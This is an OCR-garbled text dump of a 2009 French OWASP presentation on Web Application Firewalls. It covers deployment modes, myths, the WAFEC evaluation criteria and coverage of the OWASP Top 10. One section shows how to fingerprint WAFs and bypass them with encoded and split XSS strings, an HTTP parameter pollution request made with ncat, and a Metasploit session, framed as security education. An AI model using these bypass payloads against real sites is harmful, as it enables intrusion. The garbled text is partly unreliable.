Les WAFs
Contents
1. Web Application Firewalls WAF Ss S bastien GIORIA sebastien gioria owasp org French Chapter Leader Copyright 2009 The OWASP Foundation Permission is granted to copy distribute and or modify this document under the terms of the GNU Free Documentation License The OWASP Foundation http Www owasp or Qui suis je President du CLUSIR Poitou Charentes OWASP France Leader amp Evangeliste sebastien gioria owasp org 12 ans d exp rience en S curit des Systemes d Information Differents postes de manager SSI dans la banque l assurance et les telecoms Expertise Technique v Gestion du risque Architectures fonctionnelles Audits v Consulting et Formation en R seaux et S curit 4 PenTesting Digital Forensics 4 S SDLC Domaines de pr dilection v Web 4 2 WebServices Interfaces Ins curit du Web 2009 S Gioria amp Agenda L OWASP Web Application Firewalls WAF Bi Choisir son WAF WAF Mythes et r alit s WAF mode d emploi S amuser avec son WAF Et apr s OWASP France Un Conseil d Administration Association loi 1901 Pr sident vang liste et relations publiques S bastien Gioria Consultant ind pendant en s curit des syst mes d informations Pr sident du CLUSIR Poitou Charentes Vice Pr sident et responsable du projet de Traduction Ludovic Petit Expert S curit chez SFR Secr2. Pentests manuels en urgence Formation des d veloppeurs en urgence Revue de code en urgence Agenda Et apr s 2009 S Gioria amp OWASP Pas de recette Miracie Mettre en place un cycle de d veloppement s curis Auditer et Tester son code V rifier le fonctionnement de son Application e La s curit est d abord et avant tout affaire de bon sens Rejoignez nous http www owasp fr O 2009 S Gioria amp OWASP Q
3. taire et Responsable des aspects Juridiques Estelle Aim Avocate Un Bureau Le Conseil d Administration Romain Gaucher Ex chercheur au NIST consultant chez Cigital Mathieu Estrade D veloppeur Apache Projets Sensibilisation Formations Interventions gt Top 10 traduit Assurance s Java PHP gt Infosecurity gt Guides en cours gt Soci t d EDI JAVA OSSIR gt Questionnaire a destination des gt Op rateur T l phonie mobile PHP gt Microsoft TechDays RSSI en cours WebServices gt PCI Global gt Groupe de travail de la s curit gt Diff rents services gouvernementaux gt CERT IST applicative du CLUSIF gt Conf rences dans des coles gt Soci t s du CAC40 Banque A ronautique Agenda B Web Application Firewalls WAF B O 2009 S Gioria amp OWASP 9 Faiblesse des Applications Web Attaques E enses Application Web Number of Vulnerabilities ew El ments R seaux nn Etude du GARTNER 2003 Etude du SANS septembre 2009 75 des attaques ciblent le niveau Applicatif http www sans org top cyber security risks 66 des applications web sont vuln rables La veille d un incident le retour sur investissement d un syst me de s curit est nul Le lendemain il est infini Dennis Hoffman RSA 2009 S Gioria amp OWASP Je suis prot g contr
4. de gt Blacklist R gle de type regular expression gt R seau neuronal Sera inutile Exemple sur une chaine XSS lt script gt alert XSS lt script gt 2009 S Gioria amp OWASP Bypass des WAFs Le coup de l encodage et de l espace m Encodage URL 3C 3 63 7 72 69 0 74 3e 61 6C 65 72 4 28 58 53 53 29 3b 3c 2f 73 63 2 69 0 4 3e 0a Encodage HTML amp H XI3C amp X 73 amp H X63 8 amp X1 2 8H x69 8 amp x7 7 0 8 amp x 4 amp x3e amp x61 amp x6c amp x65 amp Q x72 amp x74 amp x28 amp x58 amp Z x53 amp x53 amp x29 amp x3b amp x3c amp Z x2f amp x 73 amp x63 amp x72 amp x69 amp Zx70 amp x74 8 amp x3e amp x0a m Encode UTF 8 u003c uff53 uff43 uff 52 uff49 uff 50 uff 54 u003 e uff41 uff4c uff45 uff 52 uff 54 uff 08 uff 38 uff 33 uff 33 uff09 u003c u2215 uff53 uff43 uff 52 uff49 uff 50 uff 5 4 u003 Un petit espace lt script gt alert XSS lt scri pt gt Un petit CR lt S C m Un mix des deux 3C 20 73 20 63 20 72 20 69 20 70 20 74 20 3eE 20 0a 61 20 6C 20 65 20 2 20 4 20 28 20 58 20 53 20 53 20 29 2 0 3b 20 3c 20 2f 20 73 20 63 20 0a 72 20 69 20 0 20 74 20 3e 0a Bypass des WAFs le coup de la pollution des param tres E Bypass des WAFs le coup de la pollution des parametres ncat ssl www wafforwimps org 443 GET test aspx val lt amp val script am
5. m R sultats des scans r guliers gt Tout est vert forc ment il y a un qui voit arriver avec ses gros sabots le robot m Configuration du WAF gt Configuration faite par l ing nieur en charge des Firewalls normal c est un Web Application FIREWALL Remont e des logs dans un fichier non analys car trop d alertes gt R gles parfois permissibles car des outils type CMS propri taires font des requ tes bloqu es L attaque 1 Un lutin malveillant lance une DOS type slowloris destination du WAF en mode fail open 2 Pendant ce temps gt le lutin malveillant d couvre une injection SQL basique tr s tr s basique gt les bases sont t l charg es par le lutin malveillant 3 Le lutin revend tout ou partie de la base au meilleur offreur 4 Le lutin peut continuer boire ses Guinness La d tection Il n a t vue que la DOS Dans les bases des adresses e mails sp ciales permettent de d couvrir une compromission post attaque B investigation dans les logs HTTP a permis de d couvrir l injection SQL Le b n fice 100 de benefice financier pour le vendeur du DC de webcam machina rat a WAF 100 de benefice financier pour le undas du scanner eut va bien auana je remets Je rapport au DSl ASP e 424 29 o au minimum pour l entreprise Perte d image de marque Perte de l agr ment PCI DSS amendes
6. SP Mode Parallele Sonde WAF Web Server lt Po Client Hacker 2009 S Gioria amp OWASP Mode Intrusif Reverse Proxy Web Server Client Hacker O 2009 S Gioria amp OWASP 9 KC Int gr au serveur Web mod_security d Apache Web Server with WAF Interne gt Client Hacker 2009 S Gioria amp OWASP E Choisir son WAF son camp Negatif Positif Le WAF reconnait les attaques Concept et les bloque il autorise tous les acc s Le WAF connait le trafic l gitime et rejette tout le reste Aucun besoin de Bloque les attaques inconnues personnalisation N est pas d pendant d une Avantages Protection standard base de signature Simple a d ployer D tection pr cise Extr mement d pendant des IW Signatures Pas tr s pr cis Configuration complexe Sensible aux faux positifs 2009 S Gioria amp OWASP WAF Mythes et r alit s m m m 2009 S Gioria amp OWASP R alit s du WAF Patcher virtuellement les probl mes gt Plus ou moins efficace suivant la m thode employ e positive n gative m Cacher tout ou partie de l infrastructure En mode reverse proxy Analyseur de trafic HTTP HTTPS XML puissant Grace a ses fonctions de normalisation et son reporting MAA I Mythes du WAF C est un nouvel l ment d infrastr
7. d HTTP et d HTML Versions encodages Techniques de d tection signatures techniques de normalisation du trafic Techniques de protection brute force cookies sessions Journalisation int gration NSM type de logs gestion des donn es sensibles Rapports types de rapports distribution format Administration politiques logs Performance nb de connexions s latences Support XML WS i int gration validation XML RPC O E eS WAF Mise en place Choisir le type centralis d centralis performances gt Projet WAFEC Mettre en place l organisation gt Designer au minimum un lt WAF operation manager gt en lien avec les quipes infrastructures et d veloppement R le technico MOA Mettre en place la protection minimale gt XSS Blind SQLi m D finir les priorit s des applications prot ger It rer depuis du tra age de toutes les requ tes la protection optimale pour chacune des applications peut se d rouler sur un tres long terme WAF OWASP Top10 Mise en Place Sur un WAF Code Configuration A1 XSS Ne voit pas les XSS persistants Moyenne Moyenne a Forte pas de filtres en sortie Bloque la majorite des attaques en fonction du moteur de canonisation A2 Bon sur les protocoles connus Moyenne Moyenne Forte Injections SQL grace au blacklistage de caract res A3 RFI Peut se co
8. e les attaques j ai un firewall N Applicatioi Server SGBD Server 2009 S Gioria amp OWASP Poste Client L Mon site Web est s curis puisque il est prot g par SSL INTERNET SGBD Server 2009 S Gioria amp OWASP Et arriva le WAF PCI DSS https www pcisecuritystandards or In the context of Requirement 6 6 an application firewall is a web application firewall WAF which is a security policy enforcement point positioned between a web application and the client end point This functionality can be implemented in software or hardware running in an appliance device or in a typical server running a common operating system It may be a stand alone device or integrated into other network components B http www owasp org index php Web Application Firewall gt Le WAF est une CONTRE MESURE A web application firewall WAF is an appliance server plugin or filter that applies a set of rules to an HTTP conversation Generally these rules cover COMMON attacks such as Cross site Scripting XSS and SQL Injection By customizing the rules to your application many attacks can be identified and blocked The effort to perform this customization can be significant and needs to be maintained as the application is modified Agenda Choisir son WAF 2009 S Gioria amp OWA
9. ection Tool detection interne By Sandro Gauci amp amp Wendel G Henrique Can test for these WAFs d d d f d H L d Y MV A Ty A a d Profense m Waffun pr sent a NetCont inuum 5 EU 2009 w 4 Script python de I5 fuzzing pour Citrix ot Scaler construire une liste dotDefender de bypass du WAF wer HebKnight Securells Detection des WAFs msfconsole SSMN MA HHH d LEE LI LIII HEHEHE HART HEHEHE HEH HHH msf v3 3 dev 396 exploits 239 payloads 20 encoders 7 nops 267 aux auxi liary scanner http wimps msf auxiliary wimps gt set XSSVECTOR Users eagle msf3 modules auxiliary scanner http xssvector txt XSSVECTOR gt Users eagle msf3 modules auxiliary scanner http xssvector txt msf auxiliary wimps gt set RPORT 443 RPORT gt 443 msf auxiliary wimps gt set SSL true SSL gt true msf auxiliary wimps gt set RHOST www wafforwimps org RHOST gt msf auxiliary wimps gt run Loading Database Testing script alert XSS script Found some WAF signature body onload http ww farforwinps org hack js gt Found some WAF signature Bypass des WAFs Un WAFs sera toujours bypasse s il n impl mente pas le concept de liste blanche Toute tentative
10. p val gt amp val alert amp val amp val Fal amp val K amp val en amp val amp val amp val lt amp val amp val script amp val gt HT TP 1 0 HTTP 1 1 200 Ok Date Thu 03 Sep 2009 4 47 19 GMT Server IIS Last Modified Mon 28 Jul 2008 14 45 31 GMT Accept Ranges bytes Content Type text html Via 1 1 www wafforwimps org X Cache MISS from www wafforwimps org Connection close lt IDOCTYPE html PUBLIC W3C DTD XHTML 1 0 Strict EN http www w3 org TR xhtml1 DTD xhtml1 strict dtd gt lt html xmlns http www w3 0rg 1999 xhtml xml lang fr lang fr gt lt head gt lt meta http equiv Content Type content text html charset UTF 8 gt lt meta name ROBOTS content INDEX FOLLOW gt lt head gt lt body gt Hello Professor lt script gt alert XSS lt script gt Would you play a game lt body gt Exemple v cu de FGin utiite recyclage d ploiement d un WAF Soci t de type VPC sur un march de niche en B2B lere tape le choix B 2 options via PCI DSS 6 6 car il est bien connu que toute soci t qui vend sur internet se doit d tre conforme 1 D ployer un WAF Scan automatis s 2 Mettre en place un code review s curit SDLC Solution choisie d ployer un WAF redond Scans en mode ASP r current 1 par mois au minimum gt Magic quadrant id e des conseils en r gie promo de No l 2 me tape la vie du produit
11. ucture gt Couts suppl mentaires a int grer en PCA Comp tence suppl mentaire Source de probl mes r currents Mod le positif Chaque modification de l applicatif Mod le n gatif d pendant des mises a jours gt Complexifie le debug Ce n est pas la solution gt Il lt laisse gt passer des failles Session Hijacking l vation de privil ges HTTP response splitting Il n est pas encore obligatoire en PCI DSS Agenda WAF mode d emploi 2009 S Gioria amp OWASP Elev Majoritairement d velopp en interne 2 disponibilit des 5 sources BIER reete O D C D m Acc s total aux sources et au d veloppeurs Faible Total Acc s aux sources de l application D E Partiel WAF En ai je besoin Boite Noire Majoritairement d velopp en externe peu de sources disponibles Aucun 2009 S Gioria amp OWASP E Web Application Firewall Evaluation Criteria WAFEC Projet du Web Application Security Consortium http www webappsec org projects wafec Liste les fonctionnalit s possibles d un WAF et non les fonctions minimum n cessaires d un WAF m Permet d valuer techniquement le meilleur WAF pour son environnement en fonction de 9 crit res Type d architecture d ployer pont reverse proxy int gr SSL Support
12. upler avec un A V via Faible a Moyenne a Forte ICAP permet de whitelister les Moyenne param tres autoris s A4 Masquerade possible des ID Tres Faible Faible a Moyenne Insecure internes Objects A5 CSRF Peut ajouter des ID a la vol e Faible Moyenne WAF OWASP Top10 Mise en Place Sur un WAF Code Configuration Info Leak Bloque facilement les acces Faible a Forte Faible Error aux URL non autoris es mais detecte difficilement les erreurs cote serveur A7 Auth amp Depend du WAF et du Moyenne a Forte Faible a Forte Session Serveur Applicatif A8 Crypto Non Applicable Non Applicable Faible 9 SSL VPN Totalement adapt Faible Faible A10 Restrict Blacklistage Faible Failbe URL Agenda S amuser avec son WAF 2009 S Gioria amp OWASP Detection des WAFs Certains WAFs laissent beaucoup d informations sur leur pr sence Cookies barra counter session NCI SessionId WODSESSION Headers Server profense Server BinarySec R ponses a des attaques trigger de blacklist dans les headers HITP 1 1 200 Condition Intercepted HITP 1 1 200 Forbidden 1 1 407 Proxy Authentication Required B Ou les pages par d faut gt lt h1 gt System error hr h1 gt title Action not authorized title Detection des WAFs m WafwOOf pr sent a l AppSec EU 2009 gt Script python se basant sur une base de HRFHGBF Heb Application Firewall Det
Download Pdf Manuals
Related Search